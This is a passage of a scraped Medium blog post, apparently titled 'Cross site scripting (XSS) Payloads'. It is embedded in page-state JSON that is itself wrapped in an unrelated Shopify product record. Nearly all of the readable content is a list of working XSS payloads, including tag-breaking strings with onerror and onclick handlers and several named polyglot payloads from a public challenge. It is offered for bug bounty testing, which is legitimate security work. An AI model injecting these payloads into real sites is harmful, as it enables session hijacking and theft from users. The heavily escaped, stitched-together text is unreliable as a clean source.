88,83,83))\\u003C\\u002FSCRIPT\\u003E\\n“ onclick=alert(1)\\u002F\\u002F\\u003Cbutton ‘ onclick=alert(1)\\u002F\\u002F\\u003E *\\u002F alert(1)\\u002F\\u002F\\n'\\\"\\u003E\\u003E\\u003Cmarquee\\u003E\\u003Cimg src=x onerror=confirm(1)\\u003E\\u003C\\u002Fmarquee\\u003E\\\"\\u003E\\u003C\\u002Fplaintext\\\\\\u003E\\u003C\\u002F|\\\\\\u003E\\u003Cplaintext\\u002Fonmouseover=prompt(1)\\u003E\\u003Cscript\\u003Eprompt(1)\\u003C\\u002Fscript\\u003E@gmail.com\\u003Cisindex formaction=javascript:alert(\\u002FXSS\\u002F) 
type=submit\\u003E'--\\u003E\\\"\\u003E\\u003C\\u002Fscript\\u003E\\u003Cscript\\u003Ealert(1)\\u003C\\u002Fscript\\u003E\\\"\\u003E\\u003Cimg\\u002Fid=\\\"confirm\u0026lpar;1)\\\"\\u002Falt=\\\"\\u002F\\\"src=\\\"\\u002F\\\"onerror=eval(id\u0026%23x29;\\u003E'\\\"\\u003E\\u003Cimg src=\\\"http:\\u002F\\u002Fi.imgur.com\\u002FP8mL8.jpg\\\"\\u003E\\njavascript:\\u002F\\u002F'\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fscript\\u003E--\\u003E\\u003Cp\\\" onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F--\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\\"\\u002F\\u003C\\u002Ftextarea\\u003E*\\u002F\\u003Calert()\\u002F*' onclick=alert()\\u002F\\u002F\\u003Ea\\njavascript:\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\\"\\u002F\\u003C\\u002Fscript\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u002F--\\u003E*\\u002F\\u003Calert()\\u002F*' onclick=alert()\\u002F\\u002F\\u003E\\u002F\\njavascript:\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E--\\u003E\\u003C\\u002Fscript\\u003E\\u003Ca\\\"\\u002F\\u002F' onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F'\\u002F\\u002F\\\" --\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003Cb onclick= alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fscript --\\u003E\\u003Cli '\\u002F\\u002F\\\" '*\\u002Falert()\\u002F*', onclick=alert()\\u002F\\u002F\\njavascript:alert()\\u002F\\u002F--\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftitle\\u003E\\u003Ca\\\"\\u002F\\u002F' 
onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\n--\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\\"\\u002F\\u003C\\u002Ftextarea\\u003E\\u003Ca' onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\n\\u002F\\u003C\\u002Ftitle\\u002F'\\u002F\\u003C\\u002Fstyle\\u002F\\u003C\\u002Fscript\\u002F\\u003C\\u002Ftextarea\\u002F--\\u003E\\u003Cp\\\" onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F--\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fscript\\u003E\\u003Csvg \\\"\\u002F\\u002F' onclick=alert()\\u002F\\u002F\\n\\u002F\\u003C\\u002Ftitle\\u002F'\\u002F\\u003C\\u002Fstyle\\u002F\\u003C\\u002Fscript\\u002F--\\u003E\\u003Cp\\\" onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_71\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_71\",\"name\":\"54c4\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — from @filedescriptor’s Polyglot Challenge\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"A\",\"start\":20,\"end\":56,\"href\":\"http:\\u002F\\u002Fpolyglot.innerht.ml\",\"anchorType\":\"LINK\",\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":56,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_72\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_72\",\"name\":\"3b0d\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by 
crlf\\njavascript:\\\"\\u002F*'\\u002F*`\\u002F*--\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftemplate\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Fscript\\u003E\\u003Chtml \\\\\\\" onmouseover=\\u002F*\u0026lt;svg\\u002F*\\u002Fonload=alert()\\u002F\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_73\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_73\",\"name\":\"9f09\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by europa\\njavascript:\\\"\\u002F*'\\u002F*`\\u002F*\\\\\\\" \\u002F*\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Ftemplate\\u003E\\u003C\\u002Fscript\\u002F--\\u003E\u0026lt;svg\\u002Fonload=\\u002F*\\u003Chtml\\u002F*\\u002Fonmouseover=alert()\\u002F\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_74\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_74\",\"name\":\"6a4c\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by EdOverflow\\njavascript:\\\"\\u002F*\\\\\\\"\\u002F*`\\u002F*' \\u002F*\\u003C\\u002Ftemplate\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fscript\\u003E--\\u003E\u0026lt;svg 
onload=\\u002F*\\u003Chtml\\u002F*\\u002Fonmouseover=alert()\\u002F\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_75\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_75\",\"name\":\"9ee2\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by h1\\u002Fragnar\\njavascript:`\\u002F\\u002F\\\"\\u002F\\u002F\\\\\\\"\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftemplate\\u003E\u0026lt;svg\\u002Fonload='\\u002F*--\\u003E\\u003Chtml *\\u002F onmouseover=alert()\\u002F\\u002F'\\u003E`\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_76\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_76\",\"name\":\"ba14\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Thank you for watching and How did you like this blog ? 
Tell me in the comment box.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":83,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"EM\",\"start\":0,\"end\":83,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"ImageMetadata:\":{\"__typename\":\"ImageMetadata\",\"id\":\"\",\"alt\":null,\"focusPercentX\":null,\"focusPercentY\":null,\"originalHeight\":null,\"originalWidth\":null},\"PostViewerEdge:postId:6a492d795c0-viewerId:lo_2f5a867f56fa\":{\"__typename\":\"PostViewerEdge\",\"shouldIndexPostForExternalSearch\":true,\"id\":\"postId:6a492d795c0-viewerId:lo_2f5a867f56fa\"},\"Tag:xss-attack\":{\"__typename\":\"Tag\",\"id\":\"xss-attack\",\"displayTitle\":\"Xss Attack\",\"normalizedTagSlug\":\"xss-attack\"},\"Tag:payload\":{\"__typename\":\"Tag\",\"id\":\"payload\",\"displayTitle\":\"Payload\",\"normalizedTagSlug\":\"payload\"},\"Tag:bugsbounty\":{\"__typename\":\"Tag\",\"id\":\"bugsbounty\",\"displayTitle\":\"Bugsbounty\",\"normalizedTagSlug\":\"bugsbounty\"},\"Tag:hackerrank\":{\"__typename\":\"Tag\",\"id\":\"hackerrank\",\"displayTitle\":\"Hackerrank\",\"normalizedTagSlug\":\"hackerrank\"},\"Tag:androx47\":{\"__typename\":\"Tag\",\"id\":\"androx47\",\"displayTitle\":\"Androx47\",\"normalizedTagSlug\":\"androx47\"},\"Post:6a492d795c0\":{\"__typename\":\"Post\",\"id\":\"6a492d795c0\",\"collection\":null,\"content({\\\"postMeteringOptions\\\":{}})\":{\"__typename\":\"PostContent\",\"isLockedPreviewOnly\":false,\"bodyModel\":{\"__typename\":\"RichText\",\"sections\":[{\"__typename\":\"Section\",\"name\":\"0f21\",\"startIndex\":0,\"textLayout\":null,\"imageLayout\":null,\"backgroundImage\":null,\"videoLayout\":null,\"backgroundVideo\":null}],\"paragraphs\":[{\"__ref\":\"Paragraph:3dfccc9ad6b7_0\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_1\"},{\"__ref\":
\"Paragraph:3dfccc9ad6b7_2\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_3\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_4\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_5\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_6\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_7\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_8\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_9\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_10\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_11\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_12\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_13\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_14\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_15\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_16\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_17\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_18\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_19\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_20\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_21\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_22\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_23\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_24\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_25\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_26\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_27\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_28\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_29\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_30\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_31\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_32\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_33\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_34\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_35\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_36\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_37\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_38\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_39\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_40\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_41\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_42\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_43\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_44\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_45\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_46\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_47\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_48\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_49\"},{\"
__ref\":\"Paragraph:3dfccc9ad6b7_50\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_51\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_52\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_53\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_54\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_55\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_56\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_57\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_58\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_59\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_60\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_61\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_62\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_63\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_64\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_65\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_66\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_67\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_68\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_69\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_70\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_71\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_72\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_73\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_74\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_75\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_76\"}]},\"validatedShareKey\":\"\",\"shareKeyCreator\":null},\"creator\":{\"__ref\":\"User:6a7d492724f5\"},\"inResponseToEntityType\":null,\"isLocked\":false,\"isMarkedPaywallOnly\":false,\"lockedSource\":\"LOCKED_POST_SOURCE_NONE\",\"mediumUrl\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\",\"primaryTopic\":null,\"topics\":[{\"__typename\":\"Topic\",\"slug\":\"javascript\"},{\"__typename\":\"Topic\",\"slug\":\"programming\"}],\"isPublished\":true,\"latestPublishedVersion\":\"3dfccc9ad6b7\",\"visibility\":\"PUBLIC\",\"postResponses\":{\"__typename\":\"PostResponses\",\"count\":0},\"clapCount\":19,\"allowResponses\":true,\"isLimitedState\":false,\"title\":\"Cross site scripting (XSS) 
Payloads\",\"isSeries\":false,\"sequence\":null,\"uniqueSlug\":\"cross-site-scripting-xss-payloads-6a492d795c0\",\"socialTitle\":\"\",\"socialDek\":\"\",\"canonicalUrl\":\"\",\"metaDescription\":\"\",\"latestPublishedAt\":1617431235659,\"readingTime\":2.9283018867924526,\"previewContent\":{\"__typename\":\"PreviewContent\",\"subtitle\":\"How does XSS work?\"},\"previewImage\":{\"__ref\":\"ImageMetadata:\"},\"isShortform\":false,\"seoTitle\":\"\",\"firstPublishedAt\":1617431235659,\"updatedAt\":1641530490475,\"shortformType\":\"SHORTFORM_TYPE_LINK\",\"seoDescription\":\"\",\"viewerEdge\":{\"__ref\":\"PostViewerEdge:postId:6a492d795c0-viewerId:lo_2f5a867f56fa\"},\"isSuspended\":false,\"license\":\"ALL_RIGHTS_RESERVED\",\"tags\":[{\"__ref\":\"Tag:xss-attack\"},{\"__ref\":\"Tag:payload\"},{\"__ref\":\"Tag:bugsbounty\"},{\"__ref\":\"Tag:hackerrank\"},{\"__ref\":\"Tag:androx47\"}],\"isNewsletter\":false,\"statusForCollection\":null,\"pendingCollection\":null,\"detectedLanguage\":\"en\",\"wordCount\":776,\"layerCake\":0}}\u003c\/script\u003e\u003cscript\u003ewindow.__MIDDLEWARE_STATE__={\"session\":{\"xsrf\":\"\"},\"cache\":{\"cacheStatus\":\"HIT\"}}\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/manifest.42165799.js\"\u003e\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/9865.1496d74a.js\"\u003e\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/main.e8051c79.js\"\u003e\u003c\/script\u003e\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/instrumentation.d9108df7.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/reporting.ff22a7a5.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/5049.d1ead72d.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript 
src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/2106.21ff89d3.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6696.92b2dfc3.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/5832.a567559e.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/3366.1571a1d5.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/6040.6ceb7f43.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/4391.fd55a702.chunk.js\"\u003e\u003c\/script\u003e\n\u003cscript src=\"https:\/\/cdn-client.medium.com\/lite\/static\/js\/PostPage.MainContent.8ac17677.chunk.js\"\u003e\u003c\/script\u003e\u003cscript\u003ewindow.main();\u003c\/script\u003e\u003cscript defer src=\"https:\/\/static.cloudflareinsights.com\/beacon.min.js\/vcd15cbe7772f49c399c6a5babf22c1241717689176015\" integrity=\"sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==\" data-cf-beacon='{\"rayId\":\"8be7ddbf8f34ce51\",\"serverTiming\":{\"name\":{\"cfL4\":true}},\"version\":\"2024.8.0\",\"token\":\"0b5f665943484354a59c39c6833f7078\"}' crossorigin=\"anonymous\"\u003e\u003c\/script\u003e\n","brand":"money","offers":[{"title":"Default Title","offer_id":44178419351717,"sku":"","price":0.0,"currency_code":"IDR","in_stock":false}],"url":"https:\/\/mesoancassie.myshopify.com\/products\/medium","provider":"money","version":"1.0","type":"link"}